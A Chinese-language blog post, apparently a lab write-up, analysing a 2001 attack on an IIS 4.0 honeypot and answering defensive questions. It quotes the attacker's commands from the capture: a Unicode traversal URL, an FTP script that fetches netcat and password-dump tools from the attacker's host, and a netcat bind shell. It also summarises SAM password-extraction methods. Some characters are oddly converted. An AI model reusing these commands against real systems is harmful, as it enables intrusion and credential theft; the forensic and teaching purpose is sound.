Windows操做系統及其安全機制

時間 2019-11-08

標籤 windows 系統及其安全機制欄目 Windows 简体版

原文原文鏈接

kali視頻學習請看

http://www.cnblogs.com/lidong20179210/p/8909569.htmlhtml

Windows操做系統及其安全機制

Windows文件系統web

FAT (File Allocation Table文件分配表)
-  1980: FAT12
-  1987: FAT16
-  1995: FAT32
-  文件目錄表： Table; 文件分配表： Linked List
-  安全性弱，正在被NTFS取代
NTFS (NT File System)
-  1990s: M$/IBM joint project, 從OS/2文件系統HPFS繼承
-  NTFS v3.x for Windows NT 5.x, 較FAT更具安全性(ACL)，更好的性能、可靠性和磁盤利用效率
-  基於訪問控制列表機制保證文件讀寫安全性
-  支持任意UTF-16命名，使用B+樹進行索引， …
-  Metadata保存文件相關各類數據，保存在Meta File
  Table(MFT)

使用Metaspoit攻擊MS08-067

見另外一篇博文使用Metaspoit攻擊MS08-067shell

分析 NT 系統破解攻擊

案例分析挑戰內容：數據庫

2001年2月4日，來自213.116.251.162的攻擊者成功攻陷了蜜罐主機 172.16.1.106（主機名爲：lab.wiretrip.net），這是一次很是典型的針對NT系統的攻擊，並且咱們有理由相信攻擊者最終識別了蜜罐主機，所以這將是一個很是有趣的案例分析挑戰。你的分析數據源只有包含整個攻擊過程的二進制記錄文件，而你的任務就是從這個文件中提取並分析攻擊的所有過程

問題：

攻擊者使用了什麼破解工具進行攻擊？
攻擊者如何使用這個破解工具進入並控制了系統？
當攻擊者得到系統的訪問權後作了什麼？
咱們如何防止這樣的攻擊？
額外獎勵問題：你以爲攻擊者是否警覺了他的目標是一臺蜜罐主機？若是是，爲何？

待分析二進制文件位置：windows

ftp://222.29.112.10/exercises/course5.zip。
MD5=aca62e19ba49546d2bfd1fa1c71b5751後端
提示使用工具：
- snort
- nstream
- wireshark

1. 攻擊者使用了什麼破解工具進行攻擊？

問題解答：攻擊者利用了Unicode攻擊（針對MS00-078/MS01-026）和針對msadcs.dll中RDS漏洞（MS02-065）的msadc.pl/msadc2.pl 滲透攻擊工具進行了攻擊。
分析：安全
- 首先看到的是攻擊者對蜜罐主機安全漏洞的查點過程
  - 從攻擊主機213.116.251.162首先訪問了蜜罐172.16.1.106上的http://lab.wiretrip.net/Default.htm頁面，其User-Agent域設置爲Mozilla/4.0 (compatible; MSIE5.01; Windows NT 5.0;Hotbar2.0)，Accept字段中顯示訪問主機安裝了MS Word等軟件，可推測攻擊主機應爲NT5.0系統，安裝了MSIE5.01和Hotbar2.0插件。
  - 在點擊訪問了http://lab.wiretrip.net/guest/default.asp內部留言本頁面以後，攻擊者在SESSION:1765-80中成功進行了Unicode攻擊以打開NT系統啓動文件boot.ini，其request爲：GET/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1
  - (注： %C0%AF爲’/’的Unicode編碼， IIS4.0 和 5.0 存在Unicode Directory Traversal Vulnerability, http://www.securityfocus.com/bid/1806)
  - 隨後，在SESSION:1769-80和SESSION:1770-80中，攻擊者探測了/msadc/msadcs.dll的存在，並在SESSION:1771-80 中經過msadcs.dll中存在RDS漏洞(注：MS02-065 漏洞，http://www.microsoft.com/technet/security/Bulletin/MS02-065.mspx)進行了SQL注入攻擊，嘗
    試執行"cmd /c echo werd>>c:\fun"命令。在緊隨的SESSION:1772-80 中，攻擊者驗證其攻擊
    確實成功了。

根據「ADM!ROX!YOUR!WORLD」特徵字符串，以及查詢語句中使用了dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb，咱們能夠經過 Google 查詢到此次攻擊應是由rain forest puppy 編寫的 msadc(2).pl滲透攻擊代碼所發起的。

至此，攻擊者經過查點確認了目標系統提供 Web 服務的是臭名昭著的 IIS v4.0，並存在
Unicode 和 MDAC RDS 安全漏洞，可進行進一步滲透攻擊。

攻擊技術背景

Unicode 攻擊服務器

Unicode 攻擊原理解釋. 
   利用微軟 IIS 4.0 和 5.0 都存在利用擴展 UNICODE 字元取代"/"和"\"而能利用"../"目錄遍
歷的漏洞。
  未經受權的用戶可能利用 IUSR_machinename 帳號的上下文空間訪問任何已知的文件。該帳號在默認狀況下屬於 Everyone 和 Users 組的成員，所以任何與 Web 根目錄在同一邏輯驅動器上的能被這些用戶組訪問的文件都能被刪除，修改或執行，就如同一個用戶成功登錄
所能完成的同樣。
%c0%af = /
%c1%9c = \

MDAC SQL 注入攻擊
   IIS的MDAC 組件存在一個漏洞能夠致使攻擊者遠程執行你係統的命令。主要核心問題是存在於 RDS Datafactory， DataFactory容許使用者從遠端執行四項功能，包括：「Query」、「CreateRecordSet」、「ConvertToString」和「SubmitChanges」，其中「Query：查詢」功能就是黑客用來入侵的地方。默認狀況下， 它容許遠程命令發送到 IIS 服務器中，這命令會以設備用戶的身份運行，其通常默認狀況下是 SYSTEM 用戶。

2.攻擊者如何使用這個破解工具進入並控制了系統？

分析：網絡
- 觀察到每次 RDS 滲透攻擊間的間隔時間均爲 2-3 秒，能夠推測攻擊者是預先寫好需執
  行的 shell 指令列表，而後由 msadc(2).pl 滲透攻擊工具一塊兒執行。
- 在 RDS 攻擊因爲粗枝大葉沒寫對 FTP 腳本後，攻擊者又開始轉向 Unicode 攻擊，每條
  請求間隔時間大概在 10-12 秒，意味着這些指令多是由攻擊者手工輸入的：
```
SESSION:1874-80 "copy C:\winnt\system32\cmd.exe cmd1.exe"
SESSION:1875-80 "cmd1.exe /c open 213.116.251.162 >ftpcom"
SESSION:1876-80 "cmd1.exe /c echo johna2k >>ftpcom"
SESSION:1877-80 "cmd1.exe /c echo haxedj00 >>ftpcom"
SESSION:1879-80 "cmd1.exe /c echo get nc.exe >>ftpcom"
SESSION:1880-80 "cmd1.exe /c echo get pdump.exe >>ftpcom"
SESSION:1881-80 "cmd1.exe /c echo get samdump.dll >>ftpcom"
SESSION:1882-80 "cmd1.exe /c echo quit >>ftpcom"
SESSION:1885-80 "cmd1.exe /c ftp -s:ftpcom"
```
此次終於對了，蜜罐主機鏈接 213.116.251.162 並下載了所指定的這些文件，並經過 nc構建其一個遠程 shell 通道。SESSION:1887-80 "cmd1.exe /c nc -l -p 6969 -e cmd1.exe"接着，攻擊者鏈接 6969 端口，得到了訪問權，並進入了交互式控制階段。工具

攻擊工具介紹： Netcat

NetCat 是一個很是簡單的 Unix 工具，可以讀、寫 TCP 或 UDP 網絡鏈接(network connection)。它被設計成一個可靠的後端(back-end)工具，能被其它的程序程序或腳本直接地或容易地驅動。同時，它又是一個功能豐富的網絡調試和開發工具，由於它能夠創建你可能用到的幾乎任何類型的鏈接，以及一些很是有意思的內建功能

詳細使用方法參看
個人博客 netcat 瑞士軍刀

3．當攻擊者得到系統的訪問權後作了什麼？

經過上述針對 IIS的遠程滲透攻擊，攻擊者得到了IUSER_KENNY 用戶帳號（IIS啓動用戶）權限，但顯然他並不知足於此，雖然可以經過 MDAC RDS以SYSTEM帳號運行任意指令，但攻擊者仍然但願得到本地 Administrator 用戶權限。

4．咱們如何防止這樣的攻擊？

這個攻擊事件中被利用的兩個漏洞爲RDS和Unicode漏洞，二者都已經有相應的補丁，經過打補丁可防止遭受一樣的攻擊。不要使用 IIS4.x 這樣臭名昭著的 Web Server，若是必須使用 IIS4.x，主要的防範措施有（參考自黑客大曝光）

1.爲這些漏洞打上補丁，

2.禁用用不着的 RDS 等服務，

3.防火牆封禁網絡內部服務器發起的鏈接

4.爲 web server 在單獨的文件捲上設置虛擬根目錄

5.使用 NTFS 文件系統，由於 FAT 幾乎不提供安全功能

6.使用 IIS Lockdown 和 URLScan 等工具增強 web server

攻擊技術背景

Windows 查點 Windows SAM 口令文件破解

一、取得 Administrator 特權後，攻擊者極可能會徑直走向 NT 安全賬號管理器 SAM（Security Accounts Manager），SAM含有本地系統或所控制域（若是是域控）上全部用戶的用戶名和經加密的密碼。SAM是NT系統攻擊中的致命部位，與Unix/Linux的/etc/passwd文件至關。所以破解 SAM是特權升級和信任漏洞發掘的最具威力的工具之一。破解SAM揭示密碼最流行的工具是經典的L0phtcrack，其宣稱在450MHz P2計算機上24小時內就能破解全部的字母數字組合密碼。

二、密碼破解任務的第一步是獲取密碼文件，即獲取 SAM，但該目錄在操做系統運行期間是上鎖的，有四種獲取 SAM 數據的方法，

一是把以另一個操做系統如DOS啓動，而後從驅動器中摘取 SAM 文件；
二是拷貝由 NT 修復磁盤工具（rdisk）建立的 SAM 文件的拷貝；
三是從 SAM 中直接抽取密碼散列值；
四是對網絡用戶名/密碼交互進行網絡監聽和破解。

三、攻 擊 者 採 用 了 第 二 種 方 法 獲 取 SAM ， rdisk /s- 備 份 關 鍵 系 統 信 息 ， 在 ％
systemroot%\repair 目錄中就會建立一個名爲 sam._的 SAM 壓縮拷貝，備份的 sam._文件在使
用以前須要經過 expand 進行擴展， L0phtcrack 的較新版本經過導入功能自動完成擴展工做。

四、攻擊者也試圖採用第三種方法獲取 SAM，將從註冊表中直接轉存成相似 UNIX 上
/etc/password 文件的格式，完成這個工做的最初工具是由 Jeremy Allison 編寫的 pwdump.

五、SAM 密碼破解工具
L0phtcrack
John 殺手
帶 NT 擴展的 crack 5

Windows Net 命令
net 命令有着很是強大的功能，管理着計算機的絕大部分管理級操做和用戶級操做，包
括管理本地和遠程用戶組數據庫、管理共享資源、管理本地服務、進行網絡配置等實用操做
NET command /HELP

5．額外獎勵問題：你以爲攻擊者是否警覺了他的目標是一臺蜜罐主機？若是是，爲何？

是的，攻擊者絕對意識到了他的目標是做爲蜜罐主機的，由於他創建了一個文件，並輸入了以下內容 C:>echo best honeypot i've seen till now :) > rfp.txt.
由於該目標主機做爲 rfp 的我的網站， Web 服務所使用的 IIS 甚至沒有更新 rfp 本身所發現的 MDAC RDS安全漏洞，很容易讓攻擊者意識到這絕對是臺誘餌。